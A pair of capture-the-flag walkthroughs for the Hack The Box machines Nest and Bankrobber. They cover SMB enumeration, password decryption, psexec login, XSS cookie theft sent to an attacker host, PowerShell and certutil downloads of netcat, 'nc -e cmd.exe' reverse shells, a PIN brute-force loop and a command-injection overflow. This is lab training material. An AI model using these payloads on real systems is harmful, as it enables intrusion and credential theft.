Enter WORKGROUP\TempUser‘s password:
Try “help” to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 8 02:08:12 2019
.. D 0 Thu Aug 8 02:08:12 2019
Finance D 0 Wed Aug 7 22:40:13 2019
HR D 0 Thu Aug 8 02:08:11 2019
IT D 0 Thu Aug 8 13:59:25 2019
cd
10485247 blocks of size 4096. 6449680 blocks available
smb: \> cd IT
smb: \IT\> ls
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd Carl
smb: \IT\Carl\> ls
. D 0 Wed Aug 7 22:42:14 2019
.. D 0 Wed Aug 7 22:42:14 2019
Docs D 0 Wed Aug 7 22:44:00 2019
Reports D 0 Tue Aug 6 16:45:40 2019
VB Projects D 0 Tue Aug 6 17:41:55 2019
10485247 blocks of size 4096. 6449680 blocks available
smb: \IT\Carl\>
|
OBTAIN USER
Since the machine is currently too buggy, I decided to download the entire “VB Projects” folder to my machine and find out the hint. The VB project folder contains two subfolders, Production and WIP. The WIP contains a Visual Basic project called “RUSScanner”. I copied the entire folder to my Windows host computer and opened the project with MS Visual Studio.
As I went through the code I noticed that this program is a decrypter and I may be able to decipher the C. Smith password I found earlier.
When I debugged the project I had the below error. There is a configuration file that needs to be loaded first, I couldn’t find the configuration file so I disabled it and from the main module and added the username and password I found.
My edited main function in Module1 looks like below. After changing the code I added a breakpoint at End Sub so that debugging stops at this breakpoint and I decrypted the password.
1
2
3
4
5
6
|
Module Module1
Sub Main()
‘Dim Config As ConfigFile = ConfigFile.LoadFromFile(“RU_Config.xml”)
Dim test As New SsoIntegration With {.Username = “C.Smith”, .Password = Utils.DecryptString(“fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=”)}
End Sub
End Module
|
Now I have the password of user C.Smith: xRxRxPANCAK3SxRxRx.
C.Smith has a “HQK Reporting” folder, inside there are some files and a folder that seemed interesting, let’s download it.
ALTERNATE DATA STREAMS (ADS):
The file “Debug Mode Password.txt” in the HQK Reporting is an example of Windows Alternate Data Stream file attributes.
In the ADS, the content in the $ Data is always empty. If you find that the file “Debug Mode Password.txt” is actually a file with the “0” size, but the file contains the debug mode password.
To open / read the file, the file must be downloaded directly from Windows. If you download the file from your * nix machine, you will lose the contents and the file will become unworthy.
I used the Windows drive folder function to map the drive (//10.10.10.178/Users/C.Smith/) and download the file directly to my host computer. The PowerShell command -Stream * below will show the hidden stream name. The PowerShell command revealed the stream name as “Password”. For the next command, use “type” to read the actual password. In our case, the password is: WBQ201953D8w
I used telnet to connect the machine to the second port (4386) that we discovered in the first port scan. After connecting to Telnet, I used the debug password to enable debug mode.
> showquery 2 Domain = nest.local Port = 389 BaseOu = OU = WBQ Users, OU = Production, DC = nest, DC = local User = Administrator Password = yyEq0Uvvhq2uQOcWG8peLoeRQehqip / fKdeG / kjEVb4 =
COMPILING THE BINARY
The administrator password can be decrypted using the binary file in the directory of user C. Smith. This binary file can be downloaded to your Windows machine using the Windows network drive mapping function or from the “net view” command from the command prompt.
I download the file to a folder on my desktop using the drive folder. The binary file can be compiled with any binary compiler.
for example dnSpy: https://github.com/0xd4d/dnSpy/releases
I open the file with my debugger and start analyzing MainModule (). The two warning messages in the screenshot below caught my attention:
To run the binary, we need 2 main things, otherwise the binary will fail. We need a configuration file and a file named “HqDbImport.exe”. The configuration file was located in the LDAP folder, this can be easily copied to Notepad and I can make a duplicate. But I couldn’t find HqDbIport.exe, I checked the arguments of the binaries, but I found nowhere that this file was named after the MainModule. So I decided to make a duplicate of HqkLdap.exe and rename it to HqDbImport.exe and put it in a separate folder. I created a .config file with the content below.
1
2
3
4
5
6
7
8
9
10
11
12
13
|
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAP
>SHOWQUERY 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
|
So now I have 3 files in the new folder ready to run to decrypt the admin password:
After running the binary command line, I immediately got the administrator password decrypted.
Administrator: XtH4nkS4Pl4y1nGX
Now I am on the final step before entering the root of the system. I am using Impacket / PSExec to login to the system.
root @ kali: ~ / htb / nest # psexec.py Administrator: XtH4nkS4Pl4y1nGX@10.10.10.178 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Requesting shares on 10.10.10.178 ..... [*] Found writable share ADMIN $ [*] Uploading file wqVdOFDs.exe [*] Opening SVCManager on 10.10.10.178 ..... [*] Creating service AGLN on 10.10.10.178 ..... [*] Starting service AGLN ..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C: \ Windows \ system32> cd c: \ users \ administrator \ desktop c: \ Users \ Administrator \ Desktop> type root.txt 6594c2eb084bc0f08a42f0b94b878c41 c: \ Users \ Administrator \ Desktop>
Author: Puckiestyle
htb-bankrobber-nl
As always, first an nmap scan
root @ kali: ~ / htb / bankrobber # nmap -A 10.10.14.5 -oN AllPorts Starting Nmap 7.80 (https://nmap.org) at 2020-02-03 06:24 EST Nmap scan report for 10.10.14.5 Host is up (0.000051s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22 / tcp open ssh OpenSSH 7.9p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 2048 85: 9c: 65: 7b: ec: db: 65: ee: 28: 91: c7: 2e: 2f: e0: 22: 06 (RSA) | 256 72: bb: d3: 17: 56: d4: 0d: fe: cb: 3e: 64: c9: 5c: 7a: 41: a6 (ECDSA) | _ 256 66: 62: 0f: 03: e5: d8: 7f: e1: e8: dd: f2: ab: 17: 4c: a1: fc (ED25519) 111 / tcp open rpcbind 2-4 (RPC # 100000) | rpcinfo: | program version port / proto service | 100000 2,3,4 111 / tcp rpcbind | 100000 2,3,4 111 / udp rpcbind | 100000 3.4 111 / tcp6 rpcbind | _ 100000 3.4 111 / udp6 rpcbind 8000 / tcp open http SimpleHTTPServer 0.6 (Python 3.7.4) | _http-server-header: SimpleHTTP / 0.6 Python / 3.7.4 | _http-title: Directory listing for / Device type: general purpose Running: Linux 3.X OS CPE: cpe: / o: linux: linux_kernel: 3 OS details: Linux 3.7 - 3.10 Network Distance: 0 hops Service Info: OS: Linux; CPE: cpe: / o: linux: linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 12.88 seconds
Now we first create a new user, and then log in as this user
Then catch the admin cookie
<script> new Image (). src = "http://10.10.14.5:8000/bogus.php?output=" + document.cookie; </script>
or
<script> <img src = x onerror = this.src = 'http: //10.10.14.5: 8000 /? c =' + document.cookie> </script>
root @ kali: ~ / htb / # python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.154 - - [29 / Jan / 2020 03:24:29] code 404, message File not found 10.10.10.154 - - [29 / Jan / 2020 03:24:29] "GET /bogus.php?output=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP / 1.1" 404 -
then send an xss powershell iwr script
<script type = "text / javascript"> var Http = new XMLHttpRequest (); var url = '/ admin / backdoorchecker.php'; var params = 'cmd = dir | powershell -c "iwr -uri http://10.10.14.5:8000/nc64.exe -outfile% temp% \ a.exe";% temp% \ a.exe -e cmd.exe 10.10.14.5 1111 '; Http .open ("POST", url, true); Http.setRequestHeader ('Content-Type', 'application / x-www-form-urlencoded'); Http.send (params); </script>
If necessary, we check whether the admin auto apporoved (not necessarily necessary, only for checking)
first edit the admin cookie
catch the user shell
root @ kali: ~ / htb / bankrobber # rlwrap nc -nlvp 1111 listening on [any] 1111 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.154] 54090 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C: \ xampp \ htdocs \ admin> whoami whoami bank robber \ cortin C: \ xampp \ htdocs \ admin> cd c: \ users \ Cortin \ Desktop C: \ Users \ Cortin \ Desktop> type user.txt type user.txt f635346600876a43441cf1c6e94769ac
.
c: \ mkdir temp c: \ temp \ certutil -urlcache -split -f http://10.10.14.10:8000/plink.exe c: \ Temp \ plink.exe . \ plink.exe -R 3306: 127.0.0.1 : 3306 10.10.14.10
root @ kali: ~ / htb / bankrobber # mysql -u root -h 127.0.0.1 -p Enter password: Welcome to the MariaDB monitor. Commands end with; or \ g. Your MariaDB connection id is 1019 Server version: 10.1.38-MariaDB mariadb.org binary distribution Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\ h' for help. Type '\ c' to clear the current input statement. MariaDB [(none)]> show databases; + -------------------- + | Database | + -------------------- + | bank robber | | information_scheme | | mysql | | performance_scheme | | phpmyadmin | | test | + -------------------- + 6 rows in set (0.091 sec) MariaDB [(none)]> select LOAD_FILE ('/ Users / Administrator / Desktop / root.txt'); MariaDB [(none)]> select LOAD_FILE ('/ Users / Cortin / Desktop / user.txt');
.
later after forcing the pin (after plink reverse shell c: \ temp \ plink.exe -R 4466: 127.0.0.1: 910 10.10.14.5 )
with script
or
root @ kali: ~ / htb / bankrobber # cat bandit.sh for x in {0..9} {0..9} {0..9} {0..9}; do echo $ x | nc 192.168.1.139 910 | egrep -v "correct"; echo "Try $ x"; done
turned out to be this: 0021
C: \ temp \ certutil -urlcache -split -f http://10.10.14.5:8000/nc64.exe c: \ temp \ nc64.exe C: \ temp \ certutil -urlcache -split -f http://10.10.14.5:8000/plink.exe c: \ temp \ plink.exe . \ Plink.exe -R 4466: 127.0.0.1: 910 10.10.14.5
root @ kali: ~ / htb / bankrobber # netstat -ano | grep 4455 tcp 0 0 127.0.0.1:4455 0.0.0.0:* LISTEN off (0.00 / 0/0) tcp6 0 0 :: 1: 4455 ::: * LISTEN off (0.00 / 0/0) root @ kali: ~ / htb / bankrobber # nc 127.0.0.1 4455 ----------------------------------- --------------------------- Internet E-Coin Transfer System International Bank of Sun church v0.1 by Gio & Cneeliz ----- -------------------------------------------------- ------- Please enter your super secret 4 digit PIN code to login: [$] 0021 [$] PIN is correct, access granted! -------------------------------------------------- ------------ Please enter the amount of e-coins you would like to transfer: [$] 1 [$] Transfering $ 1 using our e-coin transfer application. [$] Executing e-coin transfer tool: C: \ Users \ admin \ Documents \ transfer.exe [$] Transaction in progress, you can safely disconnect ...
c: \ bankv2.exe is Vulnerable to an ”Integer Overflow”
it appeared after asking on forum that it was about 32 A characters
I used numbers instead of A’s so:
12345678901234567890123456789012
after this the payload must be executed
My payload was –
12345678901234567890123456789012C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236
root @ kali: ~ / htb / bankrobber # nc 127.0.0.1 4455 -------------------------------------------------- ------------ Internet E-Coin Transfer System International Bank of Sun church v0.1 by Gio & Cneeliz -------------------------------------------------- ------------ Please enter your super secret 4 digit PIN code to login: [$] 0021 [$] PIN correct, access granted! -------------------------------------------------- ------------ Please enter the amount of e-coins you would like to transfer: [$] 12345678901234567890123456789012C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236 [$] Transfer $ 12345678901234567890123456789012C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236 using our e-coin transfer application. [$] Executing e-coin transfer tool: C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236 [$] Transaction in progress, you can safely disconnect ...
root @ kali: / opt / evil-winrm # rlwrap nc -nlvp 1236 listening on [any] 1236 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.154] 49759 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C: \ Windows \ system32> whoami whoami nt authority \ system C: \ Windows \ system32> cd c: \ users \ admin \ desktop cd c: \ users \ admin \ desktop c: \ Users \ admin \ Desktop> type root.txt type root.txt aa65d8e6216585ea636eb07d4a59b197 c: \ Users \ admin \ Desktop>
Author: Puckiestyle